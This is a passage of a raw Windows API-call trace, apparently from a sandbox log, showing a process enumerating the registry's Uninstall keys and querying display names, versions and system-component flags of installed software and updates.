lpcbData=0xe21700*=0x4) returned 0x2 [0030.247] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.247] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2c, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2d, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{f325f05b-f963-4640-a43b-c8a494cdda0f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{f325f05b-f963-4640-a43b-c8a494cdda0f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{f325f05b-f963-4640-a43b-c8a494cdda0f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3e) returned 0x0 [0030.248] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.248] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{f325f05b-f963-4640-a43b-c8a494cdda0f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.248] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xe) returned 0x0 [0030.249] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.249] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2e, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.249] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.249] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.249] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.249] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.249] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2f, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0030.249] RegCloseKey (hKey=0x1a4) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20119, phkResult=0xe2171c | out: phkResult=0xe2171c*=0x1a4) returned 0x0 [0030.249] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x0, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.249] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.249] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.249] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.249] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.249] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.249] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.249] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe Flash Player ActiveX", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.249] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player ActiveX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.249] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player ActiveX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player ActiveX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x41, lpcbData=0xe21700*=0x25) returned 0x0 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Adobe Flash Player ActiveX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xd) returned 0x0 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x2, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x3, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.250] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.250] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.250] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x4, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DXM_Runtime", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DXM_Runtime", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="DXM_Runtime", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x5, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.251] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.251] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x6, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.251] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.251] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x7, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x8, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.252] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.252] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.252] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x9, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.253] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.253] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.253] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xa, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.253] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.253] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.253] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.253] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.253] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xb, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, 